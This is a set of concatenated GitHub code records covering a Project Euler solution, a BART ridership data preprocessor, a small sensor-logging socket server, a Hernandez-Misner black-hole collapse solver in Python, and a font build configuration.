utilise le package flask, qui sert une page web affichant votre nom, votre prénom, un lien qui mène vers [http://scikit-learn.org](http://scikit-learn.org) et qui affiche une figure de votre choix.\n\n# ### étape 8 : soumission\n# Envoyer votre script python ou votre notebook à mon adresse : [joris.guerry@edf.fr](mailto:joris.guerry@edf.fr)\n","repo_name":"jorisgu/tp_evaluation_python_edf","sub_path":"tp_stage.py","file_name":"tp_stage.py","file_ext":"py","file_size_in_byte":7255,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23693647674","text":"'''\nPE 19:\nYou are given the following information, but you may prefer to do some research for yourself.\n\n1 Jan 1900 was a Monday.\nThirty days has September,\nApril, June and November.\nAll the rest have thirty-one,\nSaving February alone,\nWhich has twenty-eight, rain or shine.\nAnd on leap years, twenty-nine.\nA leap year occurs on any year evenly divisible by 4, but not on a century unless it is divisible by 400.\nHow many Sundays fell on the first of the month during the twentieth century (1 Jan 1901 to 31 Dec 2000)?\n'''\n\n# From 1st to 1st Table:\n# 31 -> +3 days of the week\n# 30 -> +2\n# 29 -> +1\n# 28 -> +0\n\nmonths = [3,0,3,2,3,2,3,3,2,3,2,3]\n\nleap_months = [3,1,3,2,3,2,3,3,2,3,2,3]\n\n# days are labeled 1,2,3,4,5,6,7\n\n#start on monday\nd = 2\n\nsunday_sum = 0\n\nfor i in range(1900,2001):\n\n if(i>1900 and i%4 == 0):\n\n for x in leap_months:\n\n if(d==1):\n sunday_sum += 1\n\n d += x\n\n if(d>7):\n d = d-7\n\n else:\n\n for x in months:\n\n\n #Those sneaky bastards didn't count 1900, they start at 1901.\n #Otherwise this code would have been perfect on the first try.\n #This for loop cycles through 1900 to keep the day of the\n #week accurate, but the next if statement doesn't count the 1900 sunday months.\n if(d==1 and i>1900):\n sunday_sum += 1\n\n d += x\n\n if(d>7):\n d = d-7\n\nprint(sunday_sum)\n","repo_name":"Clayton-Adamson/Python-projects","sub_path":"euler19/euler19.py","file_name":"euler19.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11138578392","text":"import argparse\nimport csv\nimport datetime\nimport logging\nimport multiprocessing\nimport os\nimport subprocess\nimport sys\nimport urllib\n\nimport torch\n\nROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nDATA = os.path.join(ROOT, \"data\")\n\n# https://www.bart.gov/about/reports/ridership\nSOURCE_DIR = \"http://64.111.127.166/origin-destination/\"\nSOURCE_FILES = [\n \"date-hour-soo-dest-2011.csv.gz\",\n \"date-hour-soo-dest-2012.csv.gz\",\n \"date-hour-soo-dest-2013.csv.gz\",\n \"date-hour-soo-dest-2014.csv.gz\",\n \"date-hour-soo-dest-2015.csv.gz\",\n \"date-hour-soo-dest-2016.csv.gz\",\n \"date-hour-soo-dest-2017.csv.gz\",\n \"date-hour-soo-dest-2018.csv.gz\",\n]\n\n\ndef mkdir_p(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef _load_hourly_od(args_basename):\n args, basename = args_basename\n filename = os.path.join(DATA, basename.replace(\".csv.gz\", \".pkl\"))\n if os.path.exists(filename):\n return torch.load(filename)\n\n # Download source files.\n mkdir_p(DATA)\n gz_filename = os.path.join(DATA, basename)\n if not os.path.exists(gz_filename):\n url = SOURCE_DIR + basename\n logging.debug(\"downloading {}\".format(url))\n urllib.request.urlretrieve(url, gz_filename)\n csv_filename = gz_filename[:-3]\n assert csv_filename.endswith(\".csv\")\n 
if not os.path.exists(csv_filename):\n        logging.debug(\"unzipping {}\".format(gz_filename))\n        subprocess.check_call([\"gunzip\", \"-k\", gz_filename])\n        assert os.path.exists(csv_filename)\n\n    # Convert to PyTorch.\n    logging.debug(\"converting {}\".format(csv_filename))\n    start_date = datetime.datetime.strptime(\"2000-01-01\", \"%Y-%m-%d\")\n    stations = {}\n    num_rows = sum(1 for _ in open(csv_filename))\n    logging.info(\"Formatting {} rows\".format(num_rows))\n    rows = torch.empty((num_rows, 4), dtype=torch.long)\n    with open(csv_filename) as f:\n        for i, (date, hour, origin, destin, trip_count) in enumerate(csv.reader(f)):\n            date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n            date += datetime.timedelta(hours=int(hour))\n            rows[i, 0] = int((date - start_date).total_seconds() / 3600)\n            rows[i, 1] = stations.setdefault(origin, len(stations))\n            rows[i, 2] = stations.setdefault(destin, len(stations))\n            rows[i, 3] = int(trip_count)\n            if i % 10000 == 0:\n                sys.stderr.write(\".\")\n                sys.stderr.flush()\n\n    # Save data with metadata.\n    dataset = {\n        \"args\": args,\n        \"basename\": basename,\n        \"start_date\": start_date,\n        \"stations\": stations,\n        \"rows\": rows,\n        \"schema\": [\"time_hours\", \"origin\", \"destin\", \"trip_count\"],\n    }\n    logging.debug(\"saving {}\".format(filename))\n    torch.save(dataset, filename)\n    return dataset\n\n\ndef load_hourly_od(args=None):\n    filename = os.path.join(DATA, \"full-counts.pkl\")\n    if os.path.exists(filename):\n        return torch.load(filename)\n\n    datasets = multiprocessing.Pool().map(_load_hourly_od, [\n        (args, basename)\n        for basename in SOURCE_FILES\n    ])\n\n    stations = sorted(set().union(*(d[\"stations\"].keys() for d in datasets)))\n    min_time = min(int(d[\"rows\"][:, 0].min()) for d in datasets)\n    max_time = max(int(d[\"rows\"][:, 0].max()) for d in datasets)\n    num_rows = max_time - min_time + 1\n    start_date = datasets[0][\"start_date\"] + datetime.timedelta(hours=min_time)\n    logging.info(\"Loaded data from {} stations, {} hours\"\n                 .format(len(stations), num_rows))\n\n    result = torch.zeros(num_rows, len(stations), len(stations))\n    for dataset in datasets:\n        part_stations = sorted(dataset[\"stations\"], key=dataset[\"stations\"].__getitem__)\n        part_to_whole = torch.tensor(list(map(stations.index, part_stations)))\n        time = dataset[\"rows\"][:, 0] - min_time\n        origin = part_to_whole[dataset[\"rows\"][:, 1]]\n        destin = part_to_whole[dataset[\"rows\"][:, 2]]\n        count = dataset[\"rows\"][:, 3].float()\n        result[time, origin, destin] = count\n        dataset.clear()\n    logging.info(\"Loaded {} shaped data of mean {:0.3g}\"\n                 .format(result.shape, result.mean()))\n\n    dataset = {\n        \"args\": args,\n        \"stations\": stations,\n        \"start_date\": start_date,\n        \"counts\": result,\n    }\n    torch.save(dataset, filename)\n    return dataset\n\n\ndef main(args):\n    load_hourly_od(args)\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(description=\"BART data preprocessor\")\n    parser.add_argument(\"-v\", \"--verbose\", action=\"store_true\")\n    args = parser.parse_args()\n\n    logging.basicConfig(format='%(relativeCreated) 9d %(message)s',\n                        level=logging.DEBUG if args.verbose else logging.INFO)\n    main(args)\n","repo_name":"pyro-ppl/sandbox","sub_path":"2019-08-time-series/bart/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"48"} +{"seq_id":"8152293577","text":"from Models.SimulazioneModel import SimulazioneModel\nfrom Models.ProblemiSimulazioneModel 
import ProblemiSimulazioneModel\nimport time\n\n\ndef CheckEnd(simulazione):\n sim=SimulazioneModel.find_by_nome(simulazione)\n now=int(time.time())\n try:\n expected_end=sim.inizio+sim.durata\n if expected_end 1:\r\n if len(data.split(' ')[1]) > 1:\r\n message: str = data.split(' ')[1]\r\n message = message.split(';')\r\n msg_time = datetime.now().strftime('%H:%M:%S')\r\n msg_len = len(message)\r\n msg_type = message[0]\r\n if msg_type == '/DATA':\r\n msg_from = message[1]\r\n\r\n for i in range(2, msg_len):\r\n message[i] = message[i].replace('.', ',')\r\n\r\n str_msg = ' '.join(message[2:msg_len+1])\r\n str_to_send = msg_time + '///' + str_msg\r\n print(str(address[0]) + ' [' + msg_time + ']' + ' From ' + msg_from + ' got: ' + str_msg)\r\n message[1] = msg_time\r\n with open('/root/fermer/' + msg_from + '_' + datetime.now().strftime('%d-%m-%y') + '.csv', mode='a') as file:\r\n file.write(msg_time + ';' + ';'.join(message[2:msg_len+1])+'\\n')\r\n else:\r\n HDR = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n'\r\n client_socket.send(HDR.encode('utf-8') + str_to_send.encode('utf-8'))\r\n else:\r\n HDR = 'HTTP/1.1 200 OK\\r\\nContent-Type: text/html; charset=utf-8\\r\\n\\r\\n'\r\n client_socket.send(HDR.encode('utf-8') + str_to_send.encode('utf-8'))\r\n\r\n\r\nif __name__ == '__main__':\r\n start_my_server()","repo_name":"okwell-me/fermer","sub_path":"fermer.py","file_name":"fermer.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25209392737","text":"import sys\nimport numpy as np\nimport scipy\nimport matplotlib.pyplot as plt\nfrom scipy import signal\nfrom scipy.ndimage import gaussian_filter1d\nfrom scipy.interpolate import interp1d\nfrom scipy.optimize import minimize_scalar\nfrom scipy import stats\n\nfrom ms_hm.utils import *\nfrom ms_hm.timer import *\n\nfrom ipywidgets import HTML\nfrom IPython.display import display\nimport time\n\nclass HM:\n \"\"\"\n Class to integrate the Hernandez-Misner equations to study\n critical collapse of a fluid to a black hole.\n\n Equations integrated are 166a - 166d in\n https://arxiv.org/pdf/1504.02071.pdf .\n These have been slightly modified to allow for a general\n (local, temperature-dependent) pressure term.\n \"\"\"\n\n def __init__(self, MS, mOverR=0.999, sm_sigma=5,\n Abar=None, cflfac=0.2):\n\n self.timer = timer()\n \n # Try to work in case raytracing didn't finish\n R = MS.R_hm\n self.N = np.max(np.where(R>0))\n\n self.R = MS.R_hm[:self.N]\n self.m = MS.m_hm[:self.N]\n self.U = MS.U_hm[:self.N]\n self.xi = MS.xi_hm[:self.N]\n self.rho_p = MS.rho_hm[:self.N]\n self.Abar = MS.Abar[:self.N]\n\n if Abar is not None :\n print(\"Computing field values at specified Abar\")\n Abar_max = np.searchsorted(Abar, self.Abar[-1], \"left\")\n\n self.R = np.interp(Abar[:Abar_max], self.Abar, self.R)\n self.m = np.interp(Abar[:Abar_max], self.Abar, self.m)\n self.U = np.interp(Abar[:Abar_max], self.Abar, self.U)\n self.xi = np.interp(Abar[:Abar_max], self.Abar, self.xi)\n self.rho_p = np.interp(Abar[:Abar_max], self.Abar, self.rho_p)\n self.Abar = Abar[:Abar_max]\n\n self.Abar_stg = self.to_stg(self.Abar)\n \n self.sm_sigma = sm_sigma\n\n self.w0 = MS.w0\n self.alpha = MS.alpha\n\n self.qcd = MS.qcd\n\n self.t0 = MS.t0\n self.t = self.t0\n self.u = 0\n self.RH = MS.RH\n\n self.qcd = MS.qcd\n self.w0 = MS.w0\n self.alpha = MS.alpha\n\n # self.kappa = 2\n self.Q = np.zeros(self.N)\n self.Q_du = np.zeros(self.N)\n self.Q_old = 
np.zeros(self.N)\n self.Qprime = np.zeros(self.N)\n\n self.tmp = 0\n \n self.deltau_i = self.cfl_deltau(self.R, self.m, self.U, self.xi) * cflfac\n self.deltau_adap = self.deltau_i\n\n self.mOverR = mOverR\n\n self.step = 0\n\n self.start_time = time.process_time()\n self.display = HTML(value=\"Running HM simulation.\")\n display(self.display)\n\n self.mass_data = np.array([])\n self.max2moR_data = np.array([])\n\n return\n\n def dfdA0(self, field) :\n \"\"\"\n First derivative of a field at the origin\n \"\"\"\n A = self.Abar\n\n # Second-order expression\n # return 1/(A[2]-A[1]) * (\n # A[1]/A[2]*(field[2]-field[0]) - A[2]/A[1]*(field[1]-field[0])\n # )\n\n # first-order expression\n return np.amin([\n (field[1]-field[0])/(A[1]-A[0])\n # , (field[2]-field[0])/(A[2]-A[0])\n ])\n\n # convert to half grid\n def to_stg(self,arr):\n return (arr[0:-1] + arr[1:]) / 2\n\n def to_cubic_stg(self,arr):\n a1 = arr[0:-1] ** 3\n a2 = arr[1:] ** 3\n return (a1 + a2) / (np.abs(a1 + a2)) * ( np.abs(a1 + a2)/ 2) **(1/3)\n\n def gamma(self, R, m, U, xi):\n return np.sqrt(np.exp(2 * (1 - self.alpha) * xi)\n + (self.Abar * R)**2 * (U**2 - m))\n \n def P(self, rho) :\n \"\"\"\n Compute (tilded) pressure as a function of (tilded) density.\n \"\"\"\n self.timer.start(\"P\")\n H = np.exp(-self.xi) / self.RH\n rhob = 3 / (8*np.pi) * H**2\n realRho = rho * rhob\n realP = self.qcd.P(realRho)\n P = realP/rhob\n self.timer.stop(\"P\")\n return P\n \n # return the L2 error in rho\n def rho_err(self, R, m, U, xi, g, xiprime, Rprime, mprime, P, rho_p):\n temp = rho_p * g - P * self.Abar * R * U - (g + self.Abar * R * U) \\\n * (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)\n # temp = rho_p - (g + self.Abar * R * U) / (g - P/rho_p * self.Abar * R * U ) \\\n # * (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)\n return temp\n \n def rho_err_prime(self, R, m, U, xi, g, xiprime, Rprime, mprime, dPdrho, rho_p):\n temp = g - dPdrho * self.Abar * R * U \\\n #- (g + self.Abar * R * U) \\\n # * (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)\n #print((m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3))\n #print(np.abs(temp).min())\n \n #print( [(rho_p * g)[0] , (dPdrho * self.Abar * R * U)[0], (g + self.Abar * R * U)[0], (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)[0] ] )\n self.tmp = temp\n return temp\n \n def rho(self, R, m, U, xi, g, xiprime, Rprime, mprime):\n self.timer.start(\"rho\")\n\n H = np.exp(-self.xi) / self.RH\n rhob = 3 / (8*np.pi) * H**2\n \n err = np.ones_like(R)\n\n while( np.linalg.norm(err) > 1e-5 ):\n # print(np.linalg.norm(err))\n\n # Iterative method (slower)\n # P = self.qcd.P(self.rho_p * rhob) / rhob\n # rho_std = (g + self.Abar * R * U) / (g - P/self.rho_p * self.Abar * R * U ) \\\n # * (m + self.Abar * R * hm_rho_term(R, m, self.Abar, xi, self.alpha) / 3)\n # err = rho_std - self.rho_p\n # self.rho_p = rho_std\n\n # Newton's method\n dPdrho = self.qcd.dPdrho(self.rho_p * rhob)\n P = self.qcd.P(self.rho_p * rhob) / rhob\n err = self.rho_err(R, m, U, xi, g, xiprime, Rprime, mprime, P, self.rho_p)\n err_prime = self.rho_err_prime(R, m, U, xi, g, xiprime, Rprime, mprime, dPdrho, self.rho_p)\n self.rho_p = self.rho_p - err / err_prime\n \n self.rho_p = gaussian_filter1d(self.rho_p, sigma=self.sm_sigma, mode='nearest')\n\n if(len(self.rho_p[self.rho_p<=0]) > 0) :\n self.rho_p[self.rho_p<=0] = 1.0e-10\n # plt.plot(self.rho_p)\n # raise ValueError('Rho is negative.')\n\n 
self.timer.stop(\"rho\")\n return self.rho_p\n\n def rho_stg(self, R, m, U, xi, g, xiprime, Rprime, mprime):\n R_stg = self.to_stg(R)\n m_stg = self.to_stg(m)\n U_stg = self.to_stg(U)\n g_stg = self.to_stg(g)\n #R_stg = WENO_to_stg(R)\n #m_stg = WENO_to_stg(m)\n #U_stg = WENO_to_stg(U)\n #g_stg = WENO_to_stg(g)\n A_stg = self.Abar_stg\n\n H = np.exp(-self.xi) / self.RH\n rhob = 3 / (8*np.pi) * H**2\n P = self.qcd.P(rho_p * rhob) / rhob\n \n err = rho_err(R, m, U, xi, g, xiprime, Rprime, mprime, P, rho_p)\n \n temp = (g_stg + A_stg * R_stg * U_stg) / (g_stg - (self.w + Q_stg ) * A_stg * R_stg * U_stg ) \\\n * (m_stg + A_stg * R_stg * rho_term_stg(R, m, self.Abar, xi, R_stg, m_stg, A_stg, self.alpha) / 3)\n #temp = scipy.signal.savgol_filter(temp, 31, 3, mode='interp')\n return temp\n\n def ephi(self, R, U, g, xi, xiprime, Rprime):\n \"\"\"\n Return e^(phi), as described in Eq. 165c\n \"\"\"\n return ephi_term(R, U, self.Abar, xi, g, self.alpha)\n\n def elambda2(self, ephi, exi, xiprime):\n \"\"\"\n Return e^(lambda/2), as described in Eq. 165d\n \"\"\"\n return self.alpha * ephi * exi * xiprime\n\n def epsi(self, R, U, g, xi, rho, ephi, Q):\n c = self.alpha - 1 + ephi * self.Abar * R * rho * (1 + Q) /\\\n ((g + self.Abar * R * U) * (1+self.w0))\n offset = np.log(1/ephi[-1] * (g[-1] + self.Abar[-1] * R[-1] * U[-1]))\n temp = inv_derv_psi(xi, c, offset)\n return (g + self.Abar * R * U) / np.exp(temp)\n\n def drho(self, R, m, U, g, xi, Rp, mp, xip):\n rho_stg = self.rho_stg(R, m, U, xi, g, xip, Rp, mp)\n return np.concatenate( ([0], stg_dfdA(rho_stg, self.to_stg(self.Abar)) ,[0]) )\n\n def set_Q_old(self, R, m, U, xi):\n xiprime = WENO_dfdA(xi, self.Abar, 1e100)\n Rprime = WENO_dfdA(R, self.Abar, 1e100)\n mprime = WENO_dfdA(m, self.Abar, 1e100)\n Uprime = WENO_dfdA(U, self.Abar, 1e100)\n\n #xiprime = WENO_nuni_dfdA(xi, self.Vbar, self.Abar, 1e100)\n #Rprime = WENO_nuni_dfdA(R, self.Vbar, self.Abar, 1e100)\n #mprime = WENO_nuni_dfdA(m, self.Vbar, self.Abar, 1e100)\n #Uprime = WENO_nuni_dfdA(U, self.Vbar, self.Abar, 1e100)\n\n g = self.gamma(R, m, U, xi)\n r = self.rho(R, m, U, xi, g, xiprime, Rprime, mprime)\n p = self.P(r)\n self.Q_old = p / r\n \n def k_coeffs(self, R, m, U, xi) :\n self.timer.start(\"k_coeffs\")\n\n xiprime = WENO_dfdA(xi, self.Abar, 1e100)\n Rprime = WENO_dfdA(R, self.Abar, 1e100)\n mprime = WENO_dfdA(m, self.Abar, 1e100)\n Uprime = WENO_dfdA(U, self.Abar, 1e100)\n\n #xiprime = WENO_nuni_dfdA(xi, self.Vbar, self.Abar, 1e100)\n #Rprime = WENO_nuni_dfdA(R, self.Vbar, self.Abar, 1e100)\n #mprime = WENO_nuni_dfdA(m, self.Vbar, self.Abar, 1e100)\n #Uprime = WENO_nuni_dfdA(U, self.Vbar, self.Abar, 1e100)\n\n g = self.gamma(R, m, U, xi)\n r = self.rho(R, m, U, xi, g, xiprime, Rprime, mprime)\n p = self.P(r)\n Q = p / r\n Q_du = (Q - self.Q_old) / self.deltau\n Qprime = WENO_dfdA(Q, self.Abar, 1e100)\n\n exi = np.exp(xi)\n ephi = self.ephi(R, U, g, xi, xiprime, Rprime)\n elambda2 = self.elambda2(ephi, exi, xiprime)\n epsi = self.epsi(R, U, g, xi, r, ephi, p / r)\n\n # drho = self.drho(R, m, U, g, xi, Rprime, mprime, xiprime)\n drho = dfdA(r, self.Abar, 1e100)\n drho[0] = 3 * elambda2[0] / exi[0] * ((1 + self.w0) * r[0] / ephi[0] - (r[0] + p[0]) * U[0])\n drho[-1] = 0\n\n kxi = epsi / ephi / np.exp(xi) / self.alpha\n\n kR = epsi / exi * R * (U - 1/ephi)\n\n km = 3 * epsi / exi * (1/ephi * m * (1+self.w0) - U * (p +m))\n\n kU = - epsi / exi / (1 - Q) * (\n (m + 3 * p) / 2 + U**2 - U / self.alpha / ephi\n + (Q) * exi / elambda2 * Uprime \\\n + g * Q/(1+Q) / ( np.concatenate( ([1], 
self.Abar[1:]) )*R ) * (\n 3*(1 + Q)*U\n + exi*(Qprime / elambda2 - Q_du / epsi)/Q\n - 3*(1 + self.w0)*(1/ephi)\n + exi/elambda2*drho/r\n )\n )\n\n # boundary conditions\n # As described by Eq. 167\n kxi[0] = epsi[0] / elambda2[0] * self.dfdA0(xi)\n kR[0] = epsi[0] / elambda2[0] * self.dfdA0(R)\n km[0] = epsi[0] / elambda2[0] * self.dfdA0(m)\n kU[0] = epsi[0] / elambda2[0] * self.dfdA0(U)\n\n self.timer.stop(\"k_coeffs\")\n return kxi, kR, km, kU\n\n def check_progress(self, n_steps) :\n \n mass, max2moR = self.BH_mass2()\n self.mass_data = np.append(self.mass_data, mass)\n self.max2moR_data = np.append(self.max2moR_data, max2moR)\n\n if(max2moR > self.mOverR):\n print('2m/R is larger than ' + str(self.mOverR))\n return 1\n\n if(self.step%20==0) :\n self.display.value = \"Running HM sim, step \"+str(self.step)+\" of max \"+str(n_steps)\\\n +\". Current u is \"+str(self.u)+\", max 2m/R is currently \"+str(max2moR)+\".
    \"\\\n +\"Time Elapsed is: \"+str(time.process_time() - self.start_time)+\" s\"\n\n if(self.step%1000==0) :\n print(\"u:\", self.u, \"time:\", time.process_time() - self.start_time,\n \"step:\", self.step, \"max2moR:\", max2moR, \"mass:\", mass)\n\n return 0\n\n def extrap_mass(self, start=-25, len=15, incr=500) :\n mextraps = []\n\n for s in range(start, -len-1) :\n e=s+len\n x = self.max2moR_data[s*incr:e*incr:incr]\n y = self.mass_data[s*incr:e*incr:incr]\n fit = stats.linregress(x, y)\n mextrap = fit.slope*1 + fit.intercept\n mextraps.append(mextrap)\n\n self.mextraps = mextraps\n return mextraps[-1], np.mean(mextraps), np.std(mextraps)\n\n def adap_run_steps(self, n_steps, adj_intv=-1, tol=1e-7) :\n\n deltau = self.deltau_adap\n self.deltau = deltau\n self.set_Q_old(self.R, self.m, self.U, self.xi)\n\n kxi1, kR1, km1, kU1 = self.k_coeffs(self.R, self.m, self.U, self.xi)\n\n while(self.step < n_steps) :\n self.timer.start(\"adap_run_steps\")\n\n # if(self.step % 200 == 0) : \n #plt.plot(np.sqrt(np.exp(2 * (1 - self.alpha) * self.xi)))\n # plt.semilogy(self.R**2 * self.m * self.Abar**2 * np.exp(2 * (self.alpha-1) * self.xi))\n if (deltau < 1e-10):\n print(\"Warning, the time step is too small!\")\n break\n if self.check_progress(n_steps) > 0 :\n break\n\n self.deltau = deltau\n kxi2, kR2, km2, kU2 = self.k_coeffs(self.R + deltau/2*kR1, self.m + deltau/2*km1,\n self.U + deltau/2*kU1, self.xi + deltau/2*kxi1)\n kxi3, kR3, km3, kU3 = self.k_coeffs(self.R + 3*deltau/4*kR2, self.m + 3*deltau/4*km2,\n self.U + 3*deltau/4*kU2, self.xi + 3*deltau/4*kxi2)\n\n\n\n xi_new = self.xi + deltau/9*(2*kxi1 + 3*kxi2 + 4*kxi3 )\n R_new = self.R + deltau/9*(2*kR1 + 3*kR2 + 4*kR3 )\n m_new = self.m + deltau/9*(2*km1 + 3*km2 + 4*km3 )\n U_new = self.U + deltau/9*(2*kU1 + 3*kU2 + 4*kU3 )\n\n kxi4, kR4, km4, kU4 = self.k_coeffs(R_new , m_new , U_new, xi_new)\n\n E_xi = np.max( np.abs(deltau * (-5*kxi1/72 + kxi2/12 + kxi3/9 - kxi4/8)))\n E_R = np.max( np.abs((deltau * (-5*kR1/72 + kR2/12 + kR3/9 - kR4/8))))\n E_m = np.max( np.abs(deltau * (-5*km1/72 + km2/12 + km3/9 - km4/8)))\n E_U = np.max( np.abs(deltau * (-5*kU1/72 + kU2/12 + kU3/9 - kU4/8)))\n\n max_err_xi = np.max(np.abs(self.xi)) * tol\n max_err_R = np.max(np.abs(self.R)) * tol\n max_err_m = np.max(np.abs(self.m)) * tol\n max_err_U = np.max(np.abs(self.U)) * tol\n\n if(E_xi < max_err_xi and E_R < max_err_R and E_m < max_err_m and E_U < max_err_U):\n self.xi = xi_new\n self.R = R_new\n self.m = m_new\n self.U = U_new\n\n kxi1 = np.copy(kxi4)\n kR1 = np.copy(kR4)\n km1 = np.copy(km4)\n kU1 = np.copy(kU4)\n\n self.step += 1\n self.set_Q_old(self.R, self.m, self.U, self.xi)\n self.u += deltau\n\n # Adjust step size.\n self.q = 0.8*np.min((max_err_xi/E_xi, max_err_R/E_R, max_err_m/E_m, max_err_U/E_U) )**(1/3) # conservative optimal step factor\n self.q = min(self.q,10) # limit stepsize growth\n deltau *= self.q\n self.deltau_adap = deltau\n\n self.timer.stop(\"adap_run_steps\")\n\n\n def run_steps(self, n_steps, adj_intv=-1) :\n\n deltau = self.deltau_i\n self.deltau = deltau\n self.set_Q_old(self.R, self.m, self.U, self.xi)\n\n while(self.step < n_steps) :\n self.timer.start(\"run_steps\")\n\n if self.check_progress(n_steps) > 0 :\n break\n\n if(adj_intv > 0 and self.step % adj_intv == 0):\n deltau = self.cfl_deltau(self.R, self.m, self.U, self.xi) * 0.05\n\n self.deltau = deltau\n #der_U = dfdA(np.exp(self.xi * (self.alpha-1)) * self.Abar * self.R * self.U , self.Abar, 1e100)\n\n #self.Q = self.kappa * (self.Abar[1])**2 * der_U**2\n #Q = 
self.w*np.ones_like(p)\n #self.Qprime = dfdA(self.Q , self.Abar, 1e100)\n #self.Q_du = (Q - self.Q_old) / deltau\n\n #self.Q[der_U > 0] = 0\n #self.Qprime[der_U>0] = 0\n #self.Q_du[der_U>0] = 0\n\n kxi1, kR1, km1, kU1 = self.k_coeffs(self.R, self.m, self.U, self.xi)\n kxi2, kR2, km2, kU2 = self.k_coeffs(self.R + deltau/2*kR1, self.m + deltau/2*km1,\n self.U + deltau/2*kU1, self.xi + deltau/2*kxi1)\n kxi3, kR3, km3, kU3 = self.k_coeffs(self.R + deltau/2*kR2, self.m + deltau/2*km2,\n self.U + deltau/2*kU2, self.xi + deltau/2*kxi2)\n kxi4, kR4, km4, kU4 = self.k_coeffs(self.R + deltau*kR3, self.m + deltau*km3,\n self.U + deltau*kU3, self.xi + deltau*kxi3)\n\n # print(deltau, ((kU1 + 2*kU2 + 2*kU3 + kU4)), self.U)\n\n self.xi = self.xi + (deltau/6*(kxi1 + 2*kxi2 + 2*kxi3 + kxi4))\n self.R = self.R + (deltau/6*(kR1 + 2*kR2 + 2*kR3 + kR4))\n self.m = self.m + (deltau/6*(km1 + 2*km2 + 2*km3 + km4))\n self.U = self.U + (deltau/6*(kU1 + 2*kU2 + 2*kU3 + kU4))\n\n self.set_Q_old(self.R, self.m, self.U, self.xi)\n self.step += 1\n self.u += deltau\n\n self.timer.stop(\"run_steps\")\n\n def BH_mass(self):\n xi = self.xi\n R = self.R\n m = self.m\n U = self.U\n\n mOverR = (R**2 * m * self.Abar**2 * np.exp(2*(self.alpha-1)*xi))\n\n if(mOverR.max() < self.mOverR):\n print('2m/R is less than the threshold, no BH forms!')\n return -1\n\n xiprime = WENO_dfdA(xi, self.Abar, 1e100)\n Rprime = WENO_dfdA(R, self.Abar, 1e100)\n mprime = WENO_dfdA(m, self.Abar, 1e100)\n\n g = self.gamma(R, m, U, xi)\n r = self.rho(R, m, U, xi, g, xiprime, Rprime, mprime)\n exi = np.exp(xi)\n ephi = self.ephi(R, U, g, xi, xiprime, Rprime)\n elambda2 = self.elambda2(ephi, exi, xiprime)\n epsi = self.epsi(R, U, g, xi, r, ephi)\n for pos in range(self.N):\n if epsi[pos] > 1e-6:\n break\n\n a = np.exp(self.alpha * self.xi)\n H = np.exp(-self.xi) / self.RH\n rho_b = a**(1+self.w0)\n Rb = a * self.A\n\n return (( (np.exp(-self.xi/2) * self.R **3 * self.Abar**3 * self.m ) / 2 )[pos])\n\n def BH_mass2(self):\n xi = self.xi\n R = self.R\n m = self.m\n U = self.U\n\n mOverR = (R**2 * m * self.Abar**2 * np.exp(2*(self.alpha-1)*xi))\n xs = np.arange(len(mOverR))\n xnearmax = max(2, min( mOverR.argmax(), len(mOverR)-2 ))\n fn_mOverR = interp1d(xs, -1*mOverR, kind='cubic')\n xatmax = minimize_scalar(fn_mOverR, bounds=(xnearmax-1, xnearmax+1), method='bounded')\n xatmax = xatmax.x\n\n mass_expr = (np.exp(-self.xi/2) * self.R **3 * self.Abar**3 * self.m ) / 2\n fn_mass_expr = interp1d(xs, mass_expr, kind='cubic')\n\n return fn_mass_expr(xatmax), -1.0*fn_mOverR(xatmax)\n\n\n def cfl_deltau(self, R, m, U, xi):\n xiprime = WENO_dfdA(xi, self.Abar, 1e100)\n Rprime = WENO_dfdA(R, self.Abar, 1e100)\n mprime = WENO_dfdA(m, self.Abar, 1e100)\n\n g = self.gamma(R, m, U, xi)\n r = self.rho(R, m, U, xi, g, xiprime, Rprime, mprime)\n #p = self.P(r)\n exi = np.exp(xi)\n ephi = self.ephi(R, U, g, xi, xiprime, Rprime)\n elambda2 = self.elambda2(ephi, exi, xiprime)\n epsi = self.epsi(R, U, g, xi, r, ephi, self.w0)\n return ((1 / np.sqrt(self.w0) - 1) * (self.Abar[1] - self.Abar[0]) * elambda2 / epsi).min()\n","repo_name":"jbmertens/criticalcollapse","sub_path":"ms_hm/HM.py","file_name":"HM.py","file_ext":"py","file_size_in_byte":19541,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"13189969704","text":"#! 
/usr/bin/env AFDKOPython\n# encoding: UTF-8\nfrom __future__ import division, absolute_import, print_function, unicode_literals\nimport hindkit\n\ndef client_override(self):\n    if self.name == \"Google Fonts\":\n        self.tables[\"name\"].update({\n            0: hindkit.fallback(\n                self.family.info.copyright,\n                \"Copyright {} Struckby (design@struckby.co)\".format(self.release_year_range),\n            ),\n            7: None,\n            8: \"Struckby\",\n            9: \"Saumya Kishore and Sanchit Sawaria\",\n            11: \"https://struckby.co\",\n            13: \"This Font Software is licensed under the SIL Open Font License, Version 1.1. This license is available with a FAQ at: http://scripts.sil.org/OFL\",\n            14: \"http://scripts.sil.org/OFL\",\n        })\n        self.tables[\"OS/2\"].update({\n            \"Vendor\": None,\n        })\nhindkit.Client.override = client_override\n\nfamily = hindkit.Family(\n    trademark = \"Bak-Bak\",\n    script_name = \"Devanagari\",\n    client_name = \"Google Fonts\",\n    initial_release_year = 2017,\n)\ni = family.info\ni.openTypeHheaAscender, i.openTypeHheaDescender, 